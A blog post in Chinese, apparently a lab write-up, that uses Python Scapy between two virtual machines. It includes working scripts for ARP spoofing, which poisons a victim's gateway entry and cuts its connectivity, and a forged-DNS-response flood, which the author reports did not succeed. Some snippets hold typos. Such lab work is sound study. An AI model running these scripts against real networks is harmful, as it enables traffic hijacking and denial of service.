<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib1/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hijack8.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="Scapy实验的内容（1）使用scapy在Linux下写程序来模拟完成一个简单的ARP欺骗。 （2）使用scapy在Linux下写程序来模拟完成一个简单的DNS欺骗。完整的攻击实现工作量和难度都很大。为了降低难度，可以不实现中间人攻击，而是直接让受害者把DNS服务器修改为欺骗者的地址。">
<meta property="og:type" content="article">
<meta property="og:title" content="python-scapy进行arp和dns欺骗">
<meta property="og:url" content="http://hijack8.github.io/2022/03/10/python-scapy%E8%BF%9B%E8%A1%8Carp%E5%92%8Cdns%E6%AC%BA%E9%AA%97/index.html">
<meta property="og:site_name" content="ShallowLine&#39;sBlog">
<meta property="og:description" content="Scapy实验的内容（1）使用scapy在Linux下写程序来模拟完成一个简单的ARP欺骗。 （2）使用scapy在Linux下写程序来模拟完成一个简单的DNS欺骗。完整的攻击实现工作量和难度都很大。为了降低难度，可以不实现中间人攻击，而是直接让受害者把DNS服务器修改为欺骗者的地址。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306190721919.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306192604994.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306193728998.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306194255884.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202056321.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202627758.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202754953.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306203142247.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220307084206795.png">
<meta property="og:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220307091720422.png">
<meta property="article:published_time" content="2022-03-10T04:45:46.000Z">
<meta property="article:modified_time" content="2022-03-10T04:48:44.085Z">
<meta property="article:author" content="ShallowLine">
<meta property="article:tag" content="python">
<meta property="article:tag" content="scapy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306190721919.png">

<link rel="canonical" href="http://hijack8.github.io/2022/03/10/python-scapy%E8%BF%9B%E8%A1%8Carp%E5%92%8Cdns%E6%AC%BA%E9%AA%97/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>python-scapy进行arp和dns欺骗 | ShallowLine'sBlog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ShallowLine'sBlog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags<span class="badge">42</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories" rel="section"><i class="fa fa-th fa-fw"></i>Categories<span class="badge">19</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives" rel="section"><i class="fa fa-archive fa-fw"></i>Archives<span class="badge">37</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://hijack8.github.io/2022/03/10/python-scapy%E8%BF%9B%E8%A1%8Carp%E5%92%8Cdns%E6%AC%BA%E9%AA%97/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/haocun.jpg">
      <meta itemprop="name" content="ShallowLine">
      <meta itemprop="description" content="Blog of a Programmer">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ShallowLine'sBlog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          python-scapy进行arp和dns欺骗
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-03-10 12:45:46 / Modified: 12:48:44" itemprop="dateCreated datePublished" datetime="2022-03-10T12:45:46+08:00">2022-03-10</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/networking/" itemprop="url" rel="index"><span itemprop="name">networking</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Scapy实验的内容"><a href="#Scapy实验的内容" class="headerlink" title="Scapy实验的内容"></a>Scapy实验的内容</h2><p>（1）使用scapy在Linux下写程序来模拟完成一个简单的ARP欺骗。</p>
<p>（2）使用scapy在Linux下写程序来模拟完成一个简单的DNS欺骗。完整的攻击实现工作量和难度都很大。为了降低难度，可以不实现中间人攻击，而是直接让受害者把DNS服务器修改为欺骗者的地址。</p>
<span id="more"></span>

<h2 id="scapy功能"><a href="#scapy功能" class="headerlink" title="scapy功能"></a>scapy功能</h2><p>Scapy是一个Python程序，使用户能够发送，嗅探和剖析并伪造网络数据包。<strong>此功能允许构建可以探测，扫描或攻击网络的工具。</strong></p>
<p>Scapy是一个功能强大的交互式数据包操作程序。它能够伪造或解码大量协议的数据包，通过线路发送，捕获它们，匹配请求和回复等等。Scapy可以轻松处理大多数经典任务，如扫描，跟踪路由，探测，单元测试，攻击或网络发现。</p>
<h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><p>实验使用两个linux ubuntu版本的虚拟机。</p>
<p>其中一个为攻击虚拟机，另一个为受害者。</p>
<p>对于攻击机：</p>
<p>下载python3-scapy</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install python3-scapy</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306190721919.png" alt="image-20220306190721919"></p>
<p>这是scapy的交互式界面。</p>
<p>虽然说交互式界面也能够完成很多事情，但是显然没有直接使用py文件进行编译来的舒服。所以，我们下面学习利用python的scapy包进行操作。</p>
<p>下载包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install scapy</span><br></pre></td></tr></table></figure>

<p>运行一下ICMP包的测试程序。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sacpy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">icmp_ping = IP(dst = <span class="string">&#x27;baidu.com&#x27;</span>)/ICMP()</span><br><span class="line">icmp_ping.show()</span><br><span class="line">icmp_ping.show2()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306192604994.png" alt="image-20220306192604994"></p>
<p>Scapy 提供了四种发送数据包的方法，<code>sendp, send, srp, sr</code>。<code>sendp</code> 和 <code>send</code> 是只<strong>发送数据包</strong>，区别是前者是发送二层数据包，而后者是发送三层数据包；<code>sr</code> 和 <code>srp</code> 与之类似，只不过这两种方法<strong>还会接收返回的响应报文。</strong></p>
<p>我们尝试发送数据包</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sacpy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">icmp_ping = IP(dst = <span class="string">&#x27;192.168.153.128&#x27;</span>)/ICMP()</span><br><span class="line">icmp_ping.show()</span><br><span class="line">icmp_ping.show2()</span><br><span class="line"></span><br><span class="line">ans, unans = sr(icmp_ping)</span><br><span class="line">ans.summary()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306193728998.png" alt="image-20220306193728998"></p>
<p>尝试构建arp欺骗包</p>
<p>先观察生成的arp包。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line">arp0 = Ether(src = <span class="string">&#x27;&#x27;</span>dst = <span class="string">&#x27;192.168.153.128&#x27;</span>)/ARP()</span><br><span class="line">arp0.show()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306194255884.png" alt="image-20220306194255884"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="comment">#构造一个Ether以太网协议封装的ARP包</span></span><br><span class="line">arp0 = Ether(src = <span class="string">&#x27;00:0c:29:65:75:02&#x27;</span>,</span><br><span class="line">             dst = <span class="string">&#x27;ff:ff:ff:ff:ff:ff&#x27;</span>)/</span><br><span class="line">			 ARP(hwsrc = <span class="string">&#x27;00:0c:29:65:75:02&#x27;</span>, </span><br><span class="line">                 psrc = <span class="string">&#x27;192.168.153.2&#x27;</span>,</span><br><span class="line">                 pdst = <span class="string">&#x27;192.168.153.128&#x27;</span>,</span><br><span class="line">                 hwdst = <span class="string">&#x27;00:0c:29:dd:b6:f3&#x27;</span>,</span><br><span class="line">                 hwlen = <span class="number">6</span>, </span><br><span class="line">                 plen = <span class="number">4</span>)</span><br><span class="line"><span class="comment">#arp0.show()</span></span><br><span class="line"><span class="comment">#每隔一秒向受害机发一个包</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span> :</span><br><span class="line">    sendp(arp0)</span><br><span class="line">    time.sleep(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>观察结果：</p>
<p>这是正常的网关MAC</p>
<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202056321.png" alt="image-20220306202056321"></p>
<p>这是攻击后的网关MAC，可以看到网关的MAC变成了自己主机的MAC。</p>
<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202627758.png" alt="image-20220306202627758"></p>
<p>并且受害者主机也没法上网了。。。</p>
<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306202754953.png" alt="image-20220306202754953"></p>
<h2 id="DNS欺骗"><a href="#DNS欺骗" class="headerlink" title="DNS欺骗"></a>DNS欺骗</h2><p>构造DNS欺骗数据包，将baidu.com地址解析为1.1.1.1。</p>
<p>先观察生成DNS包的数据条目：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">dns0 = IP()/UDP()/DNS()</span><br><span class="line"></span><br><span class="line">dns0.show()</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220306203142247.png" alt="image-20220306203142247"></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> scapy.<span class="built_in">all</span> <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">dns0 = IP(src = &#x27;127.0.0.53&#x27;,dst = &#x27;192.168.153.128&#x27;)/UDP(dport = 33333,sport = 53)/DNS(</span></span><br><span class="line"><span class="string">	qd = &#x27;www.baidu.com&#x27;,</span></span><br><span class="line"><span class="string">	qr = 1,</span></span><br><span class="line"><span class="string">	ra = 1,</span></span><br><span class="line"><span class="string">	ancount = 1,</span></span><br><span class="line"><span class="string">	an = DNSRR(</span></span><br><span class="line"><span class="string">	    rrname = &#x27;www.taobao.com&#x27;,</span></span><br><span class="line"><span class="string">	    type = &#x27;A&#x27;,</span></span><br><span class="line"><span class="string">	    rclass = &#x27;IN&#x27;,</span></span><br><span class="line"><span class="string">	    ttl = 900,</span></span><br><span class="line"><span class="string">	    rdata = &#x27;1.1.1.1&#x27;</span></span><br><span class="line"><span class="string">	)</span></span><br><span class="line"><span class="string">	#opcode = 0</span></span><br><span class="line"><span class="string">	)</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="comment">#伪造回应包</span></span><br><span class="line">domain = <span class="string">&#x27;www.google.com&#x27;</span></span><br><span class="line">target_server = <span class="string">&#x27;192.168.153.128&#x27;</span></span><br><span class="line">iplist = <span class="string">&#x27;192.168.153.2&#x27;</span></span><br><span class="line"></span><br><span class="line">ID = []</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">500</span>): </span><br><span class="line">    <span class="comment">#ID.append(random.randint(0,65535))</span></span><br><span class="line">    ID.append(i)</span><br><span class="line">fake_p = IP(dst=target_server,src=iplist)/\</span><br><span class="line">         UDP(sport=<span class="number">53</span>, dport=<span class="number">33333</span>)/\</span><br><span class="line">         DNS(<span class="built_in">id</span>=ID,qr=<span class="number">1</span>,ra=<span class="number">1</span>,</span><br><span class="line">          qd=DNSQR(qname=domain,  qtype=<span class="string">&quot;A&quot;</span>, qclass=<span class="number">1</span>),</span><br><span class="line">          an=DNSRR(rrname=domain,ttl = <span class="number">7200</span>,rdata=<span class="string">&quot;1.1.1.1&quot;</span>)</span><br><span class="line">          )</span><br><span class="line"><span class="comment">#dns0.show()</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">65536</span>):</span><br><span class="line">    send(fake_p)</span><br><span class="line">    time.sleep(<span class="number">0.1</span>)</span><br></pre></td></tr></table></figure>

<p>对于dns欺骗，要比arp欺骗多一个步骤，要先把受害机发送的dns查询报文截取到，在这里使用sniff进行嗅探。</p>
<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220307084206795.png" alt="image-20220307084206795"></p>
<p><img src="https://gitee.com/Hijack8/tc/raw/master/img2/image-20220307091720422.png" alt="image-20220307091720422"></p>
<p>本次实验虽然是可以在受害者机上抓取到攻击机发送的dns包，但是dns欺骗并没有成功。</p>

    </div>

    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/python/" rel="tag"><i class="fa fa-tag"></i> python</a>
              <a href="/tags/scapy/" rel="tag"><i class="fa fa-tag"></i> scapy</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/01/C-priority-queue%E7%9A%84%E7%94%A8%E6%B3%95/" rel="prev" title="C++priority_queue的用法">
      <i class="fa fa-chevron-left"></i> C++priority_queue的用法
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Scapy%E5%AE%9E%E9%AA%8C%E7%9A%84%E5%86%85%E5%AE%B9"><span class="nav-number">1.</span> <span class="nav-text">Scapy实验的内容</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#scapy%E5%8A%9F%E8%83%BD"><span class="nav-number">2.</span> <span class="nav-text">scapy功能</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%9E%E9%AA%8C%E6%AD%A5%E9%AA%A4"><span class="nav-number">3.</span> <span class="nav-text">实验步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DNS%E6%AC%BA%E9%AA%97"><span class="nav-number">4.</span> <span class="nav-text">DNS欺骗</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ShallowLine"
      src="/images/haocun.jpg">
  <p class="site-author-name" itemprop="name">ShallowLine</p>
  <div class="site-description" itemprop="description">Blog of a Programmer</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
        
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/hijack8" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;hijack8" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:1286285985@qq.com" title="E-Mail → mailto:1286285985@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ShallowLine</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib1/anime.min.js"></script>
  <script src="/lib1/velocity/velocity.min.js"></script>
  <script src="/lib1/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
